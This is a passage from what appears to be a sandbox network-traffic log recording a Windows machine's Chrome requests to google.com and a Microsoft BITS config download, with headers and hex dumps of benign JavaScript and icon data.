CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
2024-09-26 15:55:31 UTC	828	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 1521 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Sep 2024 08:56:14 GMT Expires: Fri, 26 Sep 2025 08:56:14 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 26 Sep 2024 06:30:51 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 25157 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:31 UTC	562	IN	Data Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 77 28 22 61 4c 55 66 50 22 29 3b 0a 76 61 72 20 44 71 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 53 70 3d 61 7d 3b 76 61 72 20 45 71 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 42 6e 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2e 4d 61 29 3b 76 61 72 20 62 3d 74 68 69 73 3b 74 68 69 73 2e 77 69 6e 64 6f 77 3d 61 2e 73 65 72 76 69 63 65 2e 77 69 6e 64 6f 77 2e 67 65 74 28 29 3b 74 68 69 73 2e 74 61 3d 74 68 69 73 2e 53 70 28 29 3b 74 68 69 73 2e 6f 61 3d 77 69 6e 64 6f 77 2e 6f 72 69 65 6e 74 61 74 69 6f 6e 3b 74 68 69 73 2e 6b 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 Data Ascii: this._hd=this._hd\|\|{};(function(_){var window=this;try{_.w("aLUfP");var Dqb=function(a){this.Sp=a};var Eqb=function(a){_.Bn.call(this,a.Ma);var b=this;this.window=a.service.window.get();this.ta=this.Sp();this.oa=window.orientation;this.ka=function(){va
2024-09-26 15:55:31 UTC	959	IN	Data Raw: 69 73 2e 48 58 61 28 29 26 26 74 68 69 73 2e 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6f 72 69 65 6e 74 61 74 69 6f 6e 63 68 61 6e 67 65 22 2c 0a 74 68 69 73 2e 6b 61 29 7d 3b 5f 2e 43 28 45 71 62 2c 5f 2e 42 6e 29 3b 45 71 62 2e 47 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 7b 73 65 72 76 69 63 65 3a 7b 77 69 6e 64 6f 77 3a 5f 2e 45 6e 7d 7d 7d 3b 5f 2e 6d 3d 45 71 62 2e 70 72 6f 74 6f 74 79 70 65 3b 5f 2e 6d 2e 61 64 64 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 4e 64 2e 61 64 64 28 61 29 7d 3b 5f 2e 6d 2e 72 65 6d 6f 76 65 4c 69 73 74 65 6e 65 72 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 68 69 73 2e 4e 64 2e 64 65 6c 65 74 65 28 61 29 7d 3b 0a 5f 2e 6d 2e 53 70 3d 66 75 Data Ascii: is.HXa()&&this.window.addEventListener("orientationchange",this.ka)};_.C(Eqb,_.Bn);Eqb.Ga=function(){return{service:{window:_.En}}};_.m=Eqb.prototype;_.m.addListener=function(a){this.Nd.add(a)};_.m.removeListener=function(a){this.Nd.delete(a)};_.m.Sp=fu

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.16	49795	142.250.186.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:31 UTC	1165	OUT	GET /xjs/_/js/k=xjs.hd.en.UzAaLIOvKPw.es5.O/am=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAEAQoAAAAABAAQAAAAAAAAAAAAAAAAAAAYIAACIBAAABAHAAABAIAIAAAAEJAIAACcCjTAAACAAmAAAAAAAIAAAEigAAIAAAAAMAAIAAAAAAAAAFAAAAAAAAAAAAAAAAACCAQAAAAAAAAAAAAAAQAAAAAHoAAAAAAAAAQAAAgAABgAEyAAEAAAAAAAB9ABA8AIYUFgAAAAAAAAAAAAAACECCYC4koCAAAQAAAAAAAAAAAAAAAJCSJi5s/d=0/dg=0/br=1/rs=ACT90oG4TYLnMZI5e05pJINIZi4Fy5M0eA/m=lOO0Vd,sy8s,P6sQOc?xjs=s4 HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
2024-09-26 15:55:32 UTC	828	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/gws-team Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="gws-team" Report-To: {"group":"gws-team","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws-team"}]} Content-Length: 1671 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Sep 2024 08:56:14 GMT Expires: Fri, 26 Sep 2025 08:56:14 GMT Cache-Control: public, immutable, max-age=31536000 Last-Modified: Thu, 26 Sep 2024 06:30:51 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding, Origin Age: 25158 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:32 UTC	562	IN	Data Raw: 74 68 69 73 2e 5f 68 64 3d 74 68 69 73 2e 5f 68 64 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61 72 20 77 69 6e 64 6f 77 3d 74 68 69 73 3b 0a 74 72 79 7b 0a 5f 2e 77 28 22 6c 4f 4f 30 56 64 22 29 3b 0a 5f 2e 59 61 62 3d 6e 65 77 20 5f 2e 4e 64 28 5f 2e 6d 4c 61 29 3b 0a 5f 2e 79 28 29 3b 0a 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 76 61 72 20 69 62 62 3b 5f 2e 6a 62 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 2c 64 2c 65 29 7b 74 68 69 73 2e 4e 45 61 3d 61 3b 74 68 69 73 2e 50 6c 64 3d 62 3b 74 68 69 73 2e 70 6c 62 3d 63 3b 74 68 69 73 2e 4f 72 64 3d 64 3b 74 68 69 73 2e 72 45 64 3d 65 3b 74 68 69 73 2e 6a 63 62 3d 30 3b 74 68 69 73 2e 6f 6c 62 3d 69 62 62 28 74 68 69 73 Data Ascii: this._hd=this._hd\|\|{};(function(_){var window=this;try{_.w("lOO0Vd");_.Yab=new _.Nd(_.mLa);_.y();}catch(e){_._DumpException(e)}try{var ibb;_.jbb=function(a,b,c,d,e){this.NEa=a;this.Pld=b;this.plb=c;this.Ord=d;this.rEd=e;this.jcb=0;this.olb=ibb(this
2024-09-26 15:55:32 UTC	1109	IN	Data Raw: 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 0a 74 72 79 7b 0a 5f 2e 77 28 22 50 36 73 51 4f 63 22 29 3b 0a 76 61 72 20 6c 62 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 7b 7d 3b 5f 2e 46 61 28 61 2e 71 73 62 28 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 62 5b 65 5d 3d 21 30 7d 29 3b 76 61 72 20 63 3d 61 2e 6d 72 62 28 29 2c 64 3d 61 2e 41 72 62 28 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 6a 62 62 28 61 2e 7a 72 62 28 29 2c 63 2e 6b 61 28 29 2a 31 45 33 2c 61 2e 6d 69 62 28 29 2c 64 2e 6b 61 28 29 2a 31 45 33 2c 62 29 7d 2c 6d 62 62 3d 21 21 28 5f 2e 4b 67 5b 32 39 5d 3e 3e 32 39 26 31 29 3b 76 61 72 20 6e 62 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 42 6e 2e 63 61 6c 6c 28 74 68 69 73 2c 61 2e 4d 61 29 3b 74 68 Data Ascii: {_._DumpException(e)}try{_.w("P6sQOc");var lbb=function(a){var b={};_.Fa(a.qsb(),function(e){b[e]=!0});var c=a.mrb(),d=a.Arb();return new _.jbb(a.zrb(),c.ka()1E3,a.mib(),d.ka()1E3,b)},mbb=!!(_.Kg[29]>>29&1);var nbb=function(a){_.Bn.call(this,a.Ma);th

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.16	49796	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:31 UTC	1386	OUT	GET /favicon.ico HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
2024-09-26 15:55:32 UTC	705	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable" Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]} Content-Length: 5430 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 26 Sep 2024 15:37:24 GMT Expires: Fri, 04 Oct 2024 15:37:24 GMT Cache-Control: public, max-age=691200 Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT Content-Type: image/x-icon Vary: Accept-Encoding Age: 1088 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-09-26 15:55:32 UTC	685	IN	Data Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff Data Ascii: h& ( 0.v]X:X:rY
2024-09-26 15:55:32 UTC	1390	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea ff 3b 49 eb ff 95 9c f4 ff cf d2 fa ff d1 d4 fa ff 96 9d f4 ff 52 5e ed ff e1 e3 fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 30 00 00 00 00 fd fd fd 9d ff ff ff ff e8 ea fd ff 58 63 ee ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 6c 76 f0 ff ff ff ff ff ff ff ff ff fd fd fd 98 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd c3 ff ff ff ff f9 f9 fe ff a5 ac f6 ff 5d 69 ee ff 3c 4a Data Ascii: 7R8F2Vb5C;IR^0Xc5C5C5C5C5C5Clv]i<J
2024-09-26 15:55:32 UTC	1390	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff fd fd fd d0 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd fd fd 8b ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b1 d8 a3 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 60 a5 35 ff ca 8e 3e ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 87 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 25 fd fd fd fb ff ff ff ff ff ff ff ff ff ff ff ff c2 e0 b7 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 6e b6 54 ff 9f ce 8d ff b7 da aa ff b8 db ab ff a5 d2 95 ff 7b bc 64 ff 54 a8 35 ff 53 a8 34 ff 77 a0 37 ff e3 89 41 ff f4 85 42 ff f4 85 42 ff Data Ascii: S4S4S4S4S4S4S4S4S4S4S4S4S4S4`5>%S4S4S4S4S4S4nT{dT5S4w7ABB
2024-09-26 15:55:32 UTC	1390	IN	Data Raw: ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fb d5 bf ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd cb ff ff ff ff ff ff ff ff ff ff ff ff 46 cd fc ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 21 ae f9 ff fb fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd c8 fd fd fd 9c ff ff ff ff ff ff ff ff ff ff ff ff 86 df fd ff 05 bc fb ff 05 bc fb ff 15 93 f5 ff 34 49 eb ff b3 b8 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: BBBBBBF!4I
2024-09-26 15:55:32 UTC	575	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd 8d fd fd fd fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd fb fd fd fd 8b fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 27 fd fd fd 9f fd fd fd f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: $'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.16	49797	2.18.97.153	443

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:32 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-09-26 15:55:32 UTC	534	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y= Cache-Control: public, max-age=89446 Date: Thu, 26 Sep 2024 15:55:32 GMT Content-Length: 55 Connection: close X-CID: 2
2024-09-26 15:55:32 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.16	49798	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:32 UTC	1471	OUT	GET /gen_204?atyp=i&ct=psnt&cad=&nt=navigate&ei=64P1ZseiHfKwi-gPg-6IsAw&zx=1727366130436&opi=89978449 HTTP/1.1 Host: www.google.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
2024-09-26 15:55:32 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-U9-jBGXtWAeZyoV5oBbBKg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 26 Sep 2024 15:55:32 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.16	49799	172.217.16.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:32 UTC	1473	OUT	POST /gen_204?atyp=csi&ei=64P1ZseiHfKwi-gPg-6IsAw&s=promo&rt=hpbas.5245,hpbarr.1030&zx=1727366129148&opi=89978449 HTTP/1.1 Host: www.google.com Connection: keep-alive Content-Length: 0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-arch: "x86" sec-ch-ua-full-version: "117.0.5938.132" sec-ch-ua-platform-version: "10.0.0" sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132" sec-ch-ua-bitness: "64" sec-ch-ua-model: "" sec-ch-prefers-color-scheme: light sec-ch-ua-wow64: ?0 sec-ch-ua-platform: "Windows" Accept: / Origin: https://www.google.com X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://www.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
2024-09-26 15:55:32 UTC	715	IN	HTTP/1.1 204 No Content Content-Type: text/html; charset=UTF-8 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-_215U2_jIJTs4p06bSWeMw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/other"}]} Permissions-Policy: unload=() Date: Thu, 26 Sep 2024 15:55:32 GMT Server: gws Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.16	49801	142.250.186.132	443	6888	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 15:55:32 UTC	791	OUT	GET /logos/2024/popcorn/rc4/google_frame_mask.png HTTP/1.1 Host: www.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw== Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AVYB7cpCm7Ppd5A-tplbZAmaFYD6xsQnKIxvsmCv6L3W9rcCKonA7GZa8I8; OGPC=19037049-1:; NID=517=ti5GAL5VtwEfgOaiNnCh5VLBzKb-XRPBRa7VVj2HEFL6Capl3pYqBtKhbH6V-L0H8TlkrfjttTng8JHasNJYuQisIvIPIhEOBrfBWn6jIFnSEpf1udE1HGO-sCO9bf96TKwzHWy8LcpFs2Dgd3bT9RmatR2NzsbHC_q7LcLEifhPH1vZYGjhetf6ajDFyE6IVoCe_WxAd1iVIJZEF2wqF_g
